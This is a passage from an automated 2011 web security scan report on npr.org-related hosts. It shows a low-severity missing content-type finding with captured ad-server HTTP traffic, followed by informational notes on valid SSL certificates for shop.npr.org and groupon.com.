In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /PortalServe/?pid=1278576G80420110421221132&time=1|10:39|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B%7Esscs%3D%3f$CTURL$&r=0.699075760319829 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B2402651
...[SNIP]...

27. SSL certificate  previous
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



27.1. https://shop.npr.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.npr.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  shop.npr.org
Issued by:  Thawte Premium Server CA
Valid from:  Mon Dec 14 18:00:00 CST 2009
Valid to:  Fri Dec 16 17:59:59 CST 2011

Certificate chain #1

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

27.2. https://www.groupon.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.groupon.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Thu Jul 23 07:09:04 CDT 2009
Valid to:  Sun Jul 24 18:57:32 CDT 2011

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

Report generated by XSS.CX at Mon May 09 10:47:30 CDT 2011.